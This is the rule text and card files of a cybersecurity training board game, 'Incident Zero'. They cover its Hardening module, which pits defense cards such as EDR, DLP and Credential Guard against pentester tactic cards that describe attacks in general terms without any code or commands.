PART 3: PENTESTER RESULTS (2-3 min) 1. "Which Pentester Tactic was most surprising?" 2. "Which defense was most valuable against attacks?" 3. "How would you harden further given unlimited budget?"
PART 4: REAL-WORLD APPLICATION (2 min) 1. "If you were hardening your actual organization, what would you deploy first?" 2. "Why is defense-in-depth difficult in practice?" 3. "What's the hardest part of maintaining layered security?"
Too Easy: - Teams deploy 8+ defenses with budget to spare - All Pentester Tactics fail - No difficult decisions required
Too Hard: - Teams can only afford 3-4 defenses - Most Pentester Tactics succeed - Team feels overwhelmed
Just Right: - Teams deploy 5-7 defenses with some budget left - 50-70% of Pentester Tactics fail - Teams debate defense priorities
Adjust by: - Starting budget (120, 150, or 180) - Number of Pentester Tactics (2, 3, or 4) - Defense card availability (more common defense draws)
Narrative framing: "Your red team has tested your defenses..."
If multiple teams are hardening simultaneously: - All teams get same starting threat vectors - All teams draw from same card deck (or equivalent decks) - Highest Security Score wins - Tiebreaker: Most Budget remaining
Threat Vector: SOCIAL ENGINEERING Budget: 150 Pentester Tactics: 2
Setup: "Your team detected a phishing attack. Now harden against social engineering threats."
Suggested defenses: - D-01: Email Authentication Setup (BASIC) - D-02: User Security Training (BASIC) - D-07: Multi-Factor Authentication (ADVANCED) - D-20: Zero Trust Access Control (ELITE)
Threat Vectors: MALWARE, DATA EXFIL, NETWORK Budget: 150 Pentester Tactics: 3
Setup: "A ransomware variant targeted your industry. Prepare your defenses."
Key defenses: - D-08: EDR (Endpoint Detection & Response) - D-11: Data Loss Prevention (DLP) - D-09: Network Segmentation - D-15: Deception Technology (Honeypots) - D-19: Backup & Disaster Recovery - D-23: IR Program & Runbooks
Threat Vectors: All 6 (SOCIAL ENGINEERING, WEB EXPLOIT, CREDENTIAL ABUSE, MALWARE, NETWORK, DATA EXFIL) Budget: 150 Pentester Tactics: 4
Setup: "Your enterprise faces threats across all vectors. Build comprehensive defense-in-depth."
Challenge: Defend against all six vectors with limited budget
Duration: 45-60 minutes - Start with Budget: 200 (more resources) - Play 9 turns instead of 7 (more time) - 4-5 Pentester Tactics (more challenges) - Raise the playbook cap from 2 to 3
Focus on layering: - Each turn, discuss why defenses work together - Create explicit layer descriptions: "Layer 1 (Prevention), Layer 2 (Detection), Layer 3 (Response)" - Score based on how well defenses complement each other
Add compliance requirement: - Teams must defend against threat vectors while meeting compliance requirements (PCI-DSS, GDPR, HIPAA) - Some defenses satisfy both security and compliance - Creates strategic depth
If you won: - Continue to Incident Response Module (as follow-up) → Test your defenses against attacks - Continue to Audit & Compliance Module → Validate your security posture
If you lost: - Replay with higher budget - Try a less complex scenario - Play Incident Response to understand what defenses are actually needed
Standalone: Play again with different threat vectors and Pentester Tactics
| Action | Cost | Effect | Roll |
|---|---|---|---|
| Deploy Defense | 10/15/25 | Defense active immediately (up to 2 BASIC per action, v2.2) | None |
| Harden Upgrade | 5 | +2 effectiveness to defense | None |
| Create Playbook | 10 | +3 bonus when used once (max 2 per game, v2.2) | None |
| Test & Drill | 0 | Validate defenses | 11+ |
Pentester defense roll (v2.2): d20 + printed bonus (one chosen defense) + upgrades (+2 each) + playbook (+3) ≥ tactic DC.
For the full list of v2.2 changes and the reasoning behind them, see the "v2.2 Playtest Edition Changes" section in Module: Hardening.
Hardening Module - Standalone Play Guide Part of Incident Zero, a modular cybersecurity board game
cards/hardening/core-deck/defense-cards.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
These 24 Defense Cards are shared between the Incident Response and Hardening modules. In Hardening, teams deploy these same defenses to build defense-in-depth and test them against Pentester Tactics.
Note (v2.2): Tiers are grouped by section below. Card IDs are stable and do not renumber when a card's tier changes, so IDs within a section are not always contiguous.
SOCIAL_ENGINEERINGWEB_EXPLOITCREDENTIAL_ABUSEMALWARENETWORKDATA_EXFILVectors: plural convention (v2.2): Most defenses list a single vector. A few list two (marked "Vectors:"). A dual-tagged defense counts as a vector match for either listed vector.
Tier: BASIC (10 Budget) Vector: SOCIAL_ENGINEERING
Deploy SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail), and DMARC (Domain Message Authentication, Reporting & Conformance) to prevent email spoofing.
Effect: Blocks phishing emails claiming to be from your domain. Requires attackers to find alternative vectors.
Used Against: T-01 (Phishing Campaign)
Tier: BASIC (10 Budget) Vector: SOCIAL_ENGINEERING
Conduct phishing awareness training for all staff. Teach recognition of suspicious links, sender spoofing, urgency tactics, and credential harvesting attempts.
Effect: Reduces successful phishing rate by 70-80%. Users become your first line of defense.
Used Against: T-01, T-02 (Phishing, Watering Hole)
Tier: BASIC (10 Budget) Vector: WEB_EXPLOIT
Deploy automated Windows Update management across all systems. Establish patch deployment timelines (critical = 48 hours, high = 2 weeks).
Effect: Closes browser and kernel vulnerabilities. Prevents watering hole and exploit kit attacks.
Used Against: T-02 (Watering Hole), T-05 (Privilege Escalation)
Tier: BASIC (10 Budget) Vector: NETWORK
Deploy perimeter firewall rules to block unauthorized outbound protocols. Default-deny for unusual ports and known malware C2 domains.
Effect: Prevents early-stage lateral movement and C2 beaconing. Slows attacker reconnaissance.
Used Against: T-04 (Lateral Movement), T-09 (C2 Beaconing)
Tier: BASIC (10 Budget) Vector: MALWARE
Deploy centralized log aggregation (syslog, Splunk, ELK). Forward Windows Event Logs, firewall logs, DNS queries, and proxy logs to central SIEM.
Effect: Makes local log tampering difficult. Provides investigative visibility into attacker activities. Foundation for threat hunting.
Used Against: T-07, T-08 (Persistence attacks)
Tier: BASIC (10 Budget) Vector: MALWARE
Deploy signature-based antivirus across all endpoints. Enable automatic definition updates (daily). Configure real-time file and email scanning.
Effect: Catches known malware variants. Does not detect zero-day or polymorphic malware. Useful as part of defense-in-depth.
Used Against: T-05, T-07, T-08 (Malware-based attacks)
Tier: BASIC (10 Budget) (v2.2 — retiered from ELITE; 3-2-1 backups are fundamental hygiene) Vector: MALWARE
Implement 3-2-1 backup strategy: 3 copies of data, 2 different storage types, 1 offsite copy. Test restore procedures quarterly.
Effect: Enables rapid recovery from ransomware. Ensures data availability even if primary systems are compromised. Critical for business continuity.
Used Against: T-07, T-08, T-10, T-11, T-12 (Persistence and exfil attacks)
Tier: BASIC (10 Budget) (v2.2 — retiered from ELITE and renamed from "Incident Response Playbooks" to avoid confusion with the Hardening "Create Playbook" action) Vector: NETWORK
Establish an incident response program with detailed runbooks for common scenarios: malware infection, data exfiltration, ransomware, insider threats, supply chain compromise. Include roles, responsibilities, communication plans.
Effect: Enables faster, more coordinated response when incidents occur. Reduces confusion during high-pressure situations. Improves incident containment and recovery time.
Used Against: T-09, T-10, T-11, T-12 (All C2 & Exfil attacks)
Tier: ADVANCED (15 Budget) Vector: CREDENTIAL_ABUSE
Deploy MFA for all remote access (VPN, RDP), email, and admin portals. Use authenticator apps or hardware tokens (not SMS).
Effect: Makes compromised credentials useless without the second factor. Blocks credential stuffing attacks.
Used Against: T-03 (Compromised Credentials), T-06 (Mimikatz)
Tier: ADVANCED (15 Budget) Vector: MALWARE
Deploy EDR agent on all endpoints. Monitor process execution, file creation, registry modifications, and memory injection attempts. Enable behavioral analytics.
Effect: Detects living-off-the-land attacks (PowerShell, cmd, scheduled tasks). Provides deep visibility into attack progression.
Used Against: T-05 (Priv Esc), T-07, T-08 (Persistence)
Tier: ADVANCED (15 Budget) Vector: NETWORK
Implement VLANs and microsegmentation to separate user workstations from servers. Deploy firewall rules between segments. Implement zero-trust network access controls.
Effect: Prevents lateral movement via SMB and other internal protocols. Limits blast radius of compromise.
Used Against: T-04 (Lateral Movement), T-06 (Credential Dumping spread)
Tier: ADVANCED (15 Budget) Vector: NETWORK
Create SIEM rules to detect attack patterns: failed login spikes, privilege escalation attempts, unusual process creation, scheduled task creation, and data exfil indicators.
Effect: Correlates events across logs to detect multi-step attacks. Enables faster investigation and response.
Used Against: T-04, T-05, T-06, T-07, T-08, T-09 (Detection across entire chain)
Tier: ADVANCED (15 Budget) Vector: DATA_EXFIL
Deploy DLP to monitor outbound data transfers. Classify sensitive data (customer PII, source code, trade secrets). Block or alert on unauthorized transfers.
Effect: Prevents SQL database exfiltration and bulk data theft. Detects unusual data access patterns. Enforces data security policies.
Used Against: T-10, T-11, T-12 (Data exfiltration attacks)
Tier: ADVANCED (15 Budget) Vector: CREDENTIAL_ABUSE
Deploy enterprise password vault (CyberArk, HashiCorp Vault). Enforce strong unique passwords. Implement password rotation policies for service accounts.
Effect: Prevents credential reuse attacks. Makes credential stuffing difficult. Provides audit trail for compliance and incident investigation.
Used Against: T-03, T-06 (Credential attacks)
Tier: ADVANCED (15 Budget) (v2.2 — retiered from ELITE; IPS/WAF appliances are standard mid-tier controls) Vector: WEB_EXPLOIT
Deploy network-based IPS with exploit signatures. Monitor for known CVE exploitation patterns. Configure WAF (Web Application Firewall) rules for SQL injection, XSS, and OWASP Top 10 attacks.
Effect: Blocks exploitation attempts in transit. Prevents watering hole and web exploit attacks. Most effective when combined with patching.
Used Against: T-02 (Watering Hole), T-05 (Exploits)
Tier: ADVANCED (15 Budget) (v2.2 — retiered from ELITE; community feeds like MISP/OTX are affordable) Vectors: NETWORK, DATA_EXFIL (v2.2 — dual-tagged; counts as a match for either vector)
Subscribe to threat intelligence feeds (MISP, VirusTotal, AlienVault OTX). Integrate IOCs (Indicators of Compromise) into firewall, SIEM, and proxy. Participate in information sharing communities.
Effect: Enables faster detection of known malicious IPs and domains. Identifies emerging threats targeting your industry. Reduces detection time from days to minutes.
Used Against: T-09 (C2 Beaconing), T-10, T-11, T-12 (Exfil detection)
Tier: ELITE (25 Budget) Vector: MALWARE
Establish proactive threat hunting using MITRE ATT&CK framework. Hunt for living-off-the-land techniques, anomalous processes, suspicious registry changes, and memory injection.
Effect: Finds advanced attacks that bypass signature-based detection. Detects LSASS dumping, scheduled task persistence, and registry backdoors. Reduces dwell time significantly.
Used Against: T-05, T-07, T-08 (Advanced persistence)
Tier: ELITE (25 Budget) Vector: MALWARE
Deploy memory capture and analysis (Volatility, Memoryze). Create memory images of suspicious systems. Analyze for credential dumping, injected code, and rootkits.
Effect: Detects Mimikatz attacks and credential harvesting. Reveals attacker activities hidden from disk forensics. Critical for identifying advanced persistence mechanisms.
Used Against: T-06 (Mimikatz), T-07, T-08 (In-memory attacks)
Tier: ELITE (25 Budget) Vector: NETWORK
Deploy decoy systems (fake file servers, databases, credentials) to detect lateral movement. Create canary tokens that alert when accessed.
Effect: Any access to honeypots indicates active compromise. Detects lateral movement with zero false positives. Slows attacker progress and forces reconnaissance.
Used Against: T-04 (Lateral Movement), T-06 (Credential abuse)
Tier: ELITE (25 Budget) Vector: CREDENTIAL_ABUSE
Enable Windows Credential Guard to isolate LSASS in virtualized container. Implement UEFI Secure Boot to prevent bootkit attacks. Enable TPM attestation.
Effect: Makes Mimikatz credential dumping ineffective. Prevents bootloader manipulation. Ensures firmware integrity. Blocks entire classes of early-boot attacks.
Used Against: T-06 (Mimikatz), T-07, T-08 (Persistence)
Tier: ELITE (25 Budget) Vector: MALWARE
Deploy advanced sandboxing solution (Cuckoo, Detonate, hybrid-analysis). Analyze suspicious files/URLs in isolated environments. Generate behavioral indicators and YARA rules.
Effect: Detects zero-day malware and unknown exploits. Analyzes evasion tactics. Generates detection rules for SIEM. Prevents spread of novel malware.
Used Against: T-05 (Privilege Escalation), T-07, T-08 (Malware persistence)
Tier: ELITE (25 Budget) Vector: CREDENTIAL_ABUSE
Implement zero-trust architecture: verify every access request regardless of source. Deploy device identity, user identity, and behavior analytics. Implement conditional access policies.
Effect: Eliminates implicit trust based on network location. Even compromised devices cannot access sensitive resources without proper authentication and behavior validation.
Used Against: T-03, T-06 (Credential abuse), T-04 (Lateral movement)
Tier: ELITE (25 Budget) Vector: MALWARE
Deploy container runtime security (Falco, Sysdig). Implement image scanning for vulnerabilities. Use policy enforcement engines (OPA/Gatekeeper). Implement network policies for container segmentation.
Effect: Detects container escape attempts. Prevents vulnerable images from running. Limits lateral movement within containerized environments. Critical for modern cloud applications.
Used Against: T-05 (Priv Esc), T-04 (Lateral Movement in cloud)
Tier: ELITE (25 Budget) Vector: NETWORK
Deploy enterprise SIEM (Splunk, ELK, QRadar). Centralize logs from all sources. Implement automated correlation rules, threat intelligence integration, and incident response workflows.
Effect: Provides centralized visibility into all security events. Enables rapid threat detection and investigation. Foundation for mature incident response program.
Used Against: T-04, T-06, T-07, T-08, T-09, T-10 (Detection across entire attack chain)
Note: 24 cards total. D-24 is dual-tagged (NETWORK + DATA_EXFIL) and appears in both rows, so vector-row counts sum to 25 tags across 24 cards.
Blue Team selects a Defense Card from their hand and deploys it: - Cost: 10/15/25 Budget depending on tier - Roll Required: None—automatic success - Effect: Defense immediately becomes active and counts toward Security Score - (v2.2) Two BASIC defenses may be deployed together as a single action
When a Pentester Tactic is drawn (see Pentester Tactic Cards file), the Blue Team chooses one deployed defense to resolve it with:
Defense roll = d20 + printed defense bonus for the chosen defense (from the tactic card's bonus list) + hardening upgrades on that defense (+2 each) + relevant playbook (+3)
Success if the total is ≥ the tactic card's printed DC.
See Module: Hardening for the full resolution procedure and a worked example.
Multiple defenses work together: - BASIC defenses are cheap but carry small printed bonuses against tactics - ADVANCED defenses provide good cost/effectiveness balance - ELITE defenses are expensive but carry the largest printed bonuses against sophisticated tactics - Layering across vectors matters: each tactic card lists which defenses earn bonuses, so broad coverage means you always have a strong defense to choose
These 24 Defense Cards are the same cards used in Incident Response module. The difference in usage:
This allows educators to: - Use one physical deck for both modules - Teach defense-in-depth concepts in sequence - Show how defenses complement each other
Hardening Module: Defense Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/hardening/core-deck/pentester-tactic-cards.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Pentester Tactic Cards are unique to the Hardening Module. These 8 cards represent real-world red team attack tactics that challenge the defenses the Blue Team has deployed.
During the Hardening module gameplay:
Tactic Type: Initial Access / Social Engineering Target Vectors: SOCIAL_ENGINEERING, CREDENTIAL_ABUSE Difficulty: BASIC (defeat DC 12)
Description: A pentester calls your IT helpdesk impersonating a VIP executive. They claim to be traveling without their laptop and need emergency access to critical systems. They pressure the helpdesk with urgency and authority. Can they bypass your security procedures?
Attack Details: - Targets: User security training gaps, process enforcement - Success indicates: Social engineering protocols aren't followed - Blue Team rolls 1d20 to resist
Defending Defenses: - D-02 (User Security Training): +2 bonus (staff trained to verify callers) - D-07 (MFA): +1 bonus (second factor still required) - D-23 (IR Program & Runbooks): +2 bonus (clear escalation procedures)
Outcome: - Blue Team Succeeds (12+): Helpdesk follows proper verification procedures, attacker is denied - Blue Team Fails: Attacker gains credentials or system access; Blue Team must deploy additional defenses
Teaching Point: Social engineering exploits human psychology and organizational process gaps. Technology alone cannot defend against this; training and procedures are essential.
Tactic Type: Persistence & Execution Target Vectors: MALWARE, CREDENTIAL_ABUSE Difficulty: INTERMEDIATE (defeat DC 13)
Description: A pentester delivers a payload that uses only built-in Windows tools (PowerShell, scheduled tasks, registry modifications, WMI) to maintain persistence and establish a beachhead. No suspicious files, no external C2 traffic—just legitimate Windows features weaponized. Can your defenses detect this?
Attack Details: - Targets: Traditional antivirus, signature-based detection - Success indicates: Blind spot in malware detection strategy - Blue Team rolls 1d20 to detect and block
Defending Defenses: - D-06 (Basic Antivirus): +1 bonus only (signatures don't catch living-off-the-land) - D-08 (EDR): +3 bonus (behavioral detection catches anomalous PowerShell/schtasks) - D-13 (Threat Hunting): +2 bonus (proactive hunting finds MITRE ATT&CK techniques) - D-14 (Memory Forensics): +2 bonus (finds injected code in memory)
Outcome: - Blue Team Succeeds (13+): EDR or threat hunting detects the attack before persistence is established - Blue Team Fails: Attacker establishes persistent access; Blue Team must escalate incident response
Teaching Point: Signature-based defenses are insufficient against sophisticated attackers. Behavioral detection and proactive hunting are essential for modern threats.
Tactic Type: Privilege Escalation / Credential Access Target Vectors: CREDENTIAL_ABUSE, MALWARE Difficulty: INTERMEDIATE (defeat DC 13)
Description: A pentester with local admin privileges attempts to dump LSASS memory and extract cached domain credentials using Mimikatz. These credentials could then be used for lateral movement and privilege escalation. Can your endpoint defenses prevent this?
Attack Details: - Targets: LSASS memory protection, credential storage hardening - Success indicates: Weak credential protection on endpoints - Blue Team rolls 1d20 to block the attack
Defending Defenses: - D-07 (MFA): +1 bonus only (doesn't protect cached credentials) - D-12 (Password Vault): +2 bonus (service accounts in vault aren't in LSASS) - D-14 (Memory Forensics): +2 bonus (detects LSASS tampering) - D-16 (Credential Guard & Secure Boot): +4 bonus (isolates LSASS in virtualized container—primary defense) - D-08 (EDR): +2 bonus (alerts on suspicious LSASS access)
Outcome: - Blue Team Succeeds (13+): Credential Guard blocks the attack or EDR detects the attempt - Blue Team Fails: Domain credentials compromised; Blue Team loses future rolls vs. credential-based attacks (-1 penalty for remaining game)
Teaching Point: Privileged credential protection is critical. Credential Guard is the gold standard for endpoint protection. Service account password rotation and vaults prevent cached credential abuse.
Tactic Type: Lateral Movement Target Vectors: NETWORK, CREDENTIAL_ABUSE Difficulty: INTERMEDIATE (defeat DC 13)
Description: A pentester with access to one workstation attempts to move laterally across your network using SMB share enumeration, pass-the-hash attacks, and exploitation of unsecured share access. Can your network architecture and controls prevent this?
Attack Details: - Targets: Network segmentation, share access controls - Success indicates: Flat network with unrestricted SMB traffic - Blue Team rolls 1d20 + architecture modifiers
Defending Defenses: - D-04 (Firewall Rules): +1 bonus (blocks some traffic, but not SMB on internal network) - D-09 (Network Segmentation): +3 bonus (restricts SMB traffic between segments) - D-10 (SIEM Correlation): +2 bonus (detects lateral movement patterns) - D-15 (Honeypots): +2 bonus (attacker triggers canary token) - D-20 (Zero Trust Access): +3 bonus (even lateral access requires authentication)
Outcome: - Blue Team Succeeds (13+): Network segmentation or honeypots stop the attack - Blue Team Fails: Attacker establishes foothold on file server or domain controller; future defense deployments cost 1.5x Budget
Teaching Point: Flat networks are indefensible. Network segmentation combined with zero-trust access controls are essential. Honeypots are low-cost but highly effective deterrents.
Tactic Type: Privilege Escalation Target Vectors: MALWARE, WEB_EXPLOIT Difficulty: ADVANCED (defeat DC 14)
Description: A pentester discovers an unpatched vulnerability in a critical Windows kernel or third-party driver. They develop a local privilege escalation exploit that elevates from user to SYSTEM privileges. Can your patch management and detection systems catch this?
Attack Details: - Targets: Patch management gaps, detection of privilege escalation - Success indicates: Unpatched systems or poor vulnerability management - Blue Team rolls 1d20 to patch or detect
Defending Defenses: - D-03 (Windows Patching): +3 bonus (prevents the vulnerability from existing) - D-05 (Log Centralization): +1 bonus (may detect unusual privilege elevation attempts) - D-08 (EDR): +3 bonus (behavioral detection alerts on privilege escalation) - D-13 (Threat Hunting): +2 bonus (proactive hunting finds unpatched systems)
Outcome: - Blue Team Succeeds (14+): Patch management or EDR prevents or detects the exploit before escalation - Blue Team Fails: Attacker gains system-level access; all subsequent attacks get +1 bonus, all defensive deployments get -1 penalty for remainder of game
Teaching Point: Patch management is one of the highest-ROI security controls. Unpatched systems are low-hanging fruit for attackers. Automated patching and vulnerability scanning are essential.
Tactic Type: Exfiltration Target Vectors: DATA_EXFIL, NETWORK Difficulty: ADVANCED (defeat DC 14)
Description: A pentester with network access attempts to exfiltrate sensitive data (customer database, source code, trade secrets) via an unmonitored channel: DNS tunneling, steganography in image uploads, or a rogue cloud storage account. Can your DLP and monitoring systems catch this?
Attack Details: - Targets: Data loss prevention, network monitoring blind spots - Success indicates: Unsupervised data channels or weak DLP enforcement - Blue Team rolls 1d20 to detect and block
Defending Defenses: - D-04 (Firewall Rules): +1 bonus (may block some exfil channels) - D-05 (Log Centralization): +1 bonus (may reveal unusual network traffic) - D-10 (SIEM Correlation): +2 bonus (detects anomalous data transfer patterns) - D-11 (DLP): +4 bonus (primary defense against data exfil) - D-22 (SIEM): +2 bonus (detects data access and transfer anomalies) - D-24 (Threat Intelligence): +1 bonus (identifies known C2 domains/IPs)
Outcome: - Blue Team Succeeds (14+): DLP or network monitoring detects and blocks the exfil attempt - Blue Team Fails: Data is exfiltrated; Blue Team immediately loses the game (breach is complete)
Teaching Point: DLP and network monitoring are essential for preventing data loss. Organizations must understand their critical data flows and monitor them accordingly.
Tactic Type: Initial Access / Persistence Target Vectors: MALWARE, WEB_EXPLOIT Difficulty: ADVANCED (defeat DC 14)
Description: A pentester compromises a software vendor that your organization trusts. They inject malicious code into a legitimate update that your organization automatically deploys. The malware is signed with the vendor's legitimate certificate. Can you detect and prevent this?
Attack Details: - Targets: Update management, supply chain security, behavioral detection - Success indicates: Over-trust in vendor updates, poor verification procedures - Blue Team rolls 1d20 to detect or prevent
Defending Defenses: - D-03 (Windows Patching): +0 bonus (legitimate patch—can't be distinguished) - D-06 (Antivirus): +1 bonus only (legitimate signature—won't help) - D-08 (EDR): +3 bonus (behavioral detection catches malicious activity after installation) - D-13 (Threat Hunting): +2 bonus (proactive hunting for suspicious post-update behavior) - D-17 (Malware Sandbox): +2 bonus (detonates update before deployment) - D-21 (Container Security): +2 bonus (prevents compromise spread in containerized environments)
Outcome: - Blue Team Succeeds (14+): EDR or threat hunting detects malicious behavior before widespread compromise - Blue Team Fails: Supply chain compromise spreads across organization; -2 penalty to all defense rolls for remainder of game
Teaching Point: Trust is not security. Even legitimate vendors can be compromised. Behavioral detection, code signing verification, and staged rollouts are essential.
Tactic Type: Privilege Abuse / Data Exfiltration Target Vectors: CREDENTIAL_ABUSE, DATA_EXFIL, NETWORK Difficulty: EXPERT (defeat DC 15)
Description: A pentester acts as a disgruntled administrator with legitimate system access. They use their privileges to bypass security controls, disable logging, create backdoor accounts, and exfiltrate sensitive data. Can your controls prevent insider threats?
Attack Details: - Targets: Administrative account monitoring, privilege abuse detection - Success indicates: Weak monitoring of privileged access, overly broad admin permissions - Blue Team rolls 1d20 to detect and prevent
Defending Defenses: - D-05 (Log Centralization): +2 bonus (immutable offsite logs prevent tampering) - D-07 (MFA): +1 bonus (makes it harder to create backdoor accounts) - D-10 (SIEM Correlation): +2 bonus (detects unusual admin activity patterns) - D-12 (Password Vault): +2 bonus (requires approval/audit for privileged access) - D-20 (Zero Trust Access): +3 bonus (even admins require proper authorization for sensitive access) - D-22 (SIEM): +3 bonus (behavioral analytics detect insider threats) - D-23 (IR Program & Runbooks): +1 bonus (clear escalation for suspicious admin activity)
Outcome: - Blue Team Succeeds (15+): Monitoring detects unauthorized admin activity before damage - Blue Team Fails: Insider exfiltrates data and disables controls; Blue Team loses game immediately and additional penalties apply to Disaster Recovery module (if played next)
Teaching Point: Insider threats are one of the hardest problems in security. Prevention is impossible; detection is essential. Privileged access management, behavioral monitoring, and immutable audit logs are critical.
| Card | Tactic | Vectors | Difficulty | Primary Defense |
|---|---|---|---|---|
| PT-01 | Social Engineering | SE, CA | BASIC (DC 12) | User Training |
| PT-02 | Malware Evasion | MALWARE, CA | INTERMEDIATE (DC 13) | EDR |
| PT-03 | Credential Dumping | CA, MALWARE | INTERMEDIATE (DC 13) | Credential Guard |
| PT-04 | Lateral Movement | NETWORK, CA | INTERMEDIATE (DC 13) | Network Segmentation |
| PT-05 | Privilege Escalation | MALWARE, WEB | ADVANCED (DC 14) | Patch Management |
| PT-06 | Data Exfiltration | EXFIL, NETWORK | ADVANCED (DC 14) | DLP |
| PT-07 | Supply Chain Compromise | MALWARE, WEB | ADVANCED (DC 14) | EDR/Threat Hunting |
| PT-08 | Insider Threat | CA, EXFIL, NETWORK | EXPERT (DC 15) | Privileged Access Monitoring |
Pentester Tactics are typically drawn during turns 3-4 of the 7-turn game (v2.2). This gives the Blue Team time to deploy initial defenses but creates time pressure for the final deployment phase.
When a Pentester Tactic is drawn:
Defense roll = d20 + printed defense bonus for the chosen defense (from this tactic card's bonus list) + hardening upgrades on that defense (+2 each) + relevant playbook (+3)
Notes: - Only ONE defense's printed bonus applies per roll—there is no stacking of multiple defenses on a single roll. Layering still matters: broad coverage means a strong printed bonus is always available to choose. - If the chosen defense is not listed on the tactic card, its printed bonus is +0 (upgrades and playbooks still apply). - Multi-vector or multi-phase tactics (e.g., PT-09 in the expansion): resolve each vector/phase as a separate roll, choosing one defense for each roll.
See Module: Hardening for the full procedure and a worked example.
Each Pentester Tactic represents a real-world attack pattern that: 1. Is realistic - Based on actual TTPs (Tactics, Techniques, Procedures) from MITRE ATT&CK 2. Teaches defense priorities - Success requires defense-in-depth, not single solutions 3. Demonstrates gaps - Failing a tactic shows where the defense strategy is weak 4. Encourages layering - Multiple defenses together are stronger than any single defense
For advanced gameplay, 8 additional Pentester Tactics are available: - PT-09: Multi-Vector Attack (combines multiple tactics) - PT-10: Zero-Day Exploitation (signature-based defenses are useless) - PT-11: Ransomware Deployment & Encryption (requires backup verification) - PT-12: APT Campaign (multi-turn tactic with escalating difficulty) - PT-13: Cloud Misconfiguration Attack (for cloud-native environments) - PT-14: IoT/OT Compromise (for industrial environments) - PT-15: Firmware/BIOS Attack (hardware-level persistence) - PT-16: Container Escape (privilege escalation from containers)
See ../expansion-deck/advanced-tactics.md for these advanced cards.
Hardening Module: Pentester Tactic Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/hardening/expansion-deck/advanced-tactics.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Difficulty → DC mapping (v2.2): BASIC = DC 12, INTERMEDIATE = DC 13, ADVANCED = DC 14, EXPERT = DC 15, EXPERT+ = DC 16. The Outcome threshold on every card equals its printed DC. Resolution uses the canonical formula in Module: Hardening: d20 + printed bonus for ONE chosen defense + upgrades (+2 each) + playbook (+3) vs DC.
Advanced Pentester Tactic Cards extend the core Hardening module with 8 sophisticated attack scenarios for experienced players and complex threat environments.
Tactic Type: Advanced Persistence / Multi-Stage Target Vectors: MALWARE, CREDENTIAL_ABUSE, NETWORK, DATA_EXFIL Difficulty: ADVANCED (defeat DC 14)
Description: A pentester orchestrates a coordinated multi-vector attack that combines multiple tactics simultaneously: social engineering + malware + lateral movement + data exfiltration. Each phase is dependent on the previous one, and success in one area opens opportunities in others. Can your defenses coordinate to stop the full attack chain?
Attack Details: - Phase 1: Phishing delivers initial malware - Phase 2: Malware establishes persistence - Phase 3: Lateral movement to file server - Phase 4: Credential harvesting and exfiltration - Targets: Defense coordination, integrated threat response - Blue Team must roll separately for EACH phase
Defending Defenses: - Phase 1 (Social Engineering): D-02 (+2), D-23 (+2) reduce success by +2 on this roll - Phase 2 (Malware): D-06 (+1), D-08 (+3), D-13 (+2), D-17 (+2) for this phase - Phase 3 (Lateral Movement): D-04 (+1), D-09 (+3), D-10 (+2), D-15 (+2) for this phase - Phase 4 (Data Exfil): D-11 (+4), D-22 (+2), D-24 (+1) for this phase - Card Effect — Full Coverage: If Blue Team has deployed defenses covering all 4 targeted vectors, add +1 to each phase roll
Resolution (v2.2): Each phase is a separate roll against DC 14, with one chosen defense per roll (that phase's bonus list).
Outcome: - Blue Team Succeeds (14+ on every phase roll): Comprehensive defense stops the attack chain - Blue Team Fails ANY phase: Attack progresses; Blue Team loses 1d4 security score points per failed phase and must deploy emergency response
Teaching Point: Modern attacks are sophisticated and multi-faceted. No single defense can stop them. Comprehensive defense-in-depth with coordinated response is essential. Defense teams must practice responding to coordinated attacks.
Tactic Type: Initial Access / Execution Target Vectors: MALWARE, WEB_EXPLOIT Difficulty: EXPERT (defeat DC 15)
Description: A pentester exploits a previously unknown vulnerability (zero-day) in a critical business application. Traditional defenses (patching, signature-based detection, vulnerability scanning) cannot help because the vulnerability isn't public. Only behavioral detection or proactive hunting can identify this attack. Can your advanced monitoring catch what signature-based tools cannot?
Attack Details: - Targets: Signature-based defenses, unknown vulnerability management - Attack Vector: Unpatched but pristine application - Success indicates: Blind spots in behavioral detection - Blue Team rolls 1d20 to detect before exploitation succeeds
Defending Defenses: - D-03 (Patching): +0 bonus (zero-day by definition isn't in patches) - D-06 (Antivirus): +0 bonus (signatures don't exist for zero-day) - D-08 (EDR): +3 bonus (behavioral analytics detect anomalous post-exploitation) - D-13 (Threat Hunting): +3 bonus (proactive hunting finds zero-day activity) - D-17 (Sandbox): +2 bonus (detonates malicious payloads in sandbox before deployment) - D-18 (IPS): +1 bonus only (cannot stop unknown exploits) - D-21 (Container Security): +2 bonus (isolates exploited application)
Outcome: - Blue Team Succeeds (15+): EDR or threat hunting detects post-exploitation activity before damage - Blue Team Fails: Zero-day achieves initial access; Blue Team suffers -1 penalty to all rolls for remainder of game (blind spot in defenses)
Special Rule: If Blue Team has NOT deployed at least 2 of {D-08, D-13, D-17}, they cannot succeed at this challenge (add clause: "You must have behavioral detection to stop unknown exploits").
Teaching Point: Signature-based defenses have inherent limitations. Behavioral detection and threat hunting are essential for detecting novel attacks. Zero-day preparedness requires assumption-of-breach mindset.
Tactic Type: Impact / Extortion Target Vectors: MALWARE, DATA_EXFIL, NETWORK Difficulty: EXPERT (defeat DC 15)
Description: A pentester deploys ransomware that encrypts critical business data and demands payment for decryption keys. The attack combines malware execution, persistence, and data exfiltration (to threaten public disclosure if ransom not paid). This is the culmination of a successful attack chain. Can your defenses prevent data encryption, and can your backup strategy save you?
Attack Details: - Targets: Data availability, backup resilience, recovery procedures - Success indicates: Lack of backup redundancy or immutable backup protection - Blue Team rolls 1d20 to either: (A) prevent ransomware deployment, OR (B) recover from backup
Defending Defenses: - Option A: Prevent Deployment - D-08 (EDR): +3 bonus (detects ransomware execution) - D-13 (Threat Hunting): +2 bonus (proactive hunting finds ransomware) - D-14 (Memory Forensics): +1 bonus (detects encryption process) - D-17 (Sandbox): +2 bonus (detonates before reaching production) - D-21 (Container Security): +2 bonus (prevents spread in containerized environments)
Outcome: - Blue Team Succeeds (15+ on prevention roll, or 12+ on recovery roll under Option B): Ransomware prevented or successfully recovered from backup - Blue Team Fails: Data encrypted; immediate loss of 25% of remaining Budget, and all data-dependent operations suffer -2 penalty for remainder of game
